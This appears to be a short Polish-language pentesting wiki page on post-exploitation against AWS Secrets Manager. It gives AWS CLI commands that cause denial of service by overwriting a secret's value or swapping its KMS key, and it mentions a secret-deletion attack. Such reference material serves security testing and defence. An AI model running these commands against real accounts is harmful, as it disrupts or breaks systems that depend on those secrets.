AWS - Secrets Manager Post Exploitation
Secrets Manager
Aby uzyskać więcej informacji, sprawdź:
pageAWS - Secrets Manager EnumOdczytaj Secrets
Same sekrety są informacjami poufnymi, sprawdź stronę privesc, aby dowiedzieć się, jak je odczytać.
DoS Zmiana Wartości Sekretu
Zmieniając wartość sekretu, możesz zablokować cały system zależny od tej wartości.
Zauważ, że poprzednie wartości są również przechowywane, więc łatwo jest wrócić do poprzedniej wartości.
```bash # Requires permission secretsmanager:PutSecretValue aws secretsmanager put-secret-value \ --secret-id MyTestSecret \ --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" ``` ### Zmiana klucza KMS DoS ```bash aws secretsmanager update-secret \ --secret-id MyTestSecret \ --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE ``` ### Atak DoS na Usunięcie Sekretu
Minimalna liczba dni do usunięcia sekretu wynosi 7
Last updated